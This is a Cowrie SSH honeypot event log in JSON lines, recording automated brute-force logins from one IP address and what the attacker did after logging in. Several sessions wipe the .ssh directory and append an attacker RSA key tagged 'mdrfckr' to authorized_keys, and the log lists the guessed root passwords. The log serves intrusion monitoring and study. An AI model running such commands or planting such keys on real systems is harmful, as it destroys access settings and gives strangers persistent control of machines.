{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:09.843431Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:37:10.783235Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45208,"dst_ip":"1.2.3.4","dst_port":22,"session":"98d66b3fd5f4","protocol":"ssh","message":"New connection: 212.227.235.229:45208 (1.2.3.4:22) [session: 98d66b3fd5f4]","sensor":"my-vps","timestamp":"2025-09-09T01:37:11.220922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:11.223403Z","src_ip":"212.227.235.229","session":"98d66b3fd5f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:37:11.251208Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:37:11.251900Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:37:11.252732Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:11.478180Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:11.486631Z","src_ip":"212.227.235.229","session":"98d66b3fd5f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:37:12.024312Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.024979Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.251256Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.252088Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60024,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b21544cd79a","protocol":"ssh","message":"New connection: 212.227.235.229:60024 (1.2.3.4:22) [session: 2b21544cd79a]","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.474976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.475587Z","src_ip":"212.227.235.229","session":"2b21544cd79a"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.551419Z","src_ip":"212.227.235.229","session":"98d66b3fd5f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:12.700210Z","src_ip":"212.227.235.229","session":"2b21544cd79a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e70439c0815c","protocol":"ssh","message":"New connection: 212.227.235.229:32782 (1.2.3.4:22) [session: e70439c0815c]","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.298016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.300524Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.536509Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.640016Z","src_ip":"212.227.235.229","session":"2b21544cd79a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47022,"dst_ip":"1.2.3.4","dst_port":22,"session":"926d6b854393","protocol":"ssh","message":"New connection: 212.227.235.229:47022 (1.2.3.4:22) [session: 926d6b854393]","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.788366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.788891Z","src_ip":"212.227.235.229","session":"926d6b854393"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.813100Z","src_ip":"212.227.235.229","session":"98d66b3fd5f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:13.895051Z","src_ip":"212.227.235.229","session":"926d6b854393"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:14.364945Z","src_ip":"212.227.235.229","session":"926d6b854393"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:37:14.485243Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:14.866040Z","src_ip":"212.227.235.229","session":"2b21544cd79a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:37:15.018197Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.018914Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.020150Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60490,"dst_ip":"1.2.3.4","dst_port":22,"session":"544fca159bf6","protocol":"ssh","message":"New connection: 212.227.235.229:60490 (1.2.3.4:22) [session: 544fca159bf6]","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.099581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.100478Z","src_ip":"212.227.235.229","session":"544fca159bf6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.258547Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.334032Z","src_ip":"212.227.235.229","session":"544fca159bf6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.473446Z","src_ip":"212.227.235.229","session":"926d6b854393"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:37:15.750352Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.751063Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.991163Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:15.992077Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32790,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb9e4f57a678","protocol":"ssh","message":"New connection: 212.227.235.229:32790 (1.2.3.4:22) [session: eb9e4f57a678]","sensor":"my-vps","timestamp":"2025-09-09T01:37:16.222080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:16.222839Z","src_ip":"212.227.235.229","session":"eb9e4f57a678"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:37:16.309936Z","src_ip":"212.227.235.229","session":"544fca159bf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:16.458264Z","src_ip":"212.227.235.229","session":"eb9e4f57a678"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:16.545378Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:16.546188Z","src_ip":"212.227.235.229","session":"544fca159bf6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:17.433043Z","src_ip":"212.227.235.229","session":"eb9e4f57a678"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:18.668162Z","src_ip":"212.227.235.229","session":"eb9e4f57a678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56296,"dst_ip":"1.2.3.4","dst_port":22,"session":"13b362b1fc72","protocol":"ssh","message":"New connection: 212.227.235.229:56296 (1.2.3.4:22) [session: 13b362b1fc72]","sensor":"my-vps","timestamp":"2025-09-09T01:37:18.894073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:18.896368Z","src_ip":"212.227.235.229","session":"13b362b1fc72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed